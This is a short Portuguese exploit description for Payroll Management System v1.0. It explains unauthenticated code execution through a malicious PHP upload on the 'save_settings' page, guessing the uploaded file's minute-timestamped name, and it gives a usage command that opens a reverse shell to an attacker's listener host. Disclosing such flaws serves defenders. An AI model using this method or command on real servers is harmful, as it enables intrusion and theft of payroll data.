
Exploit de execução remota de código não autenticado para Payroll Management System v1.0 via upload de arquivo malicioso, com previsão de nome de arquivo e capacidade de shell reverso.

RCE via upload de arquivo para https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. Os nomes dos arquivos têm um timestamp adicionado com precisão de minuto. O script tenta adivinhar o nome do arquivo usando o timestamp do minuto atual, anterior e posterior.
O Payroll Management System v1.0 permite que usuários façam upload de imagens através da página "save_settings". Um atacante não autenticado pode usar essa funcionalidade para enviar um arquivo PHP malicioso. Os arquivos enviados são armazenados em uma pasta acessível publicamente e têm um timestamp com precisão de minuto acrescentado aos seus nomes, que pode ser facilmente calculado. A exploração bem-sucedida dessa vulnerabilidade resulta na capacidade de executar código arbitrário como o usuário que executa o servidor web.
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https
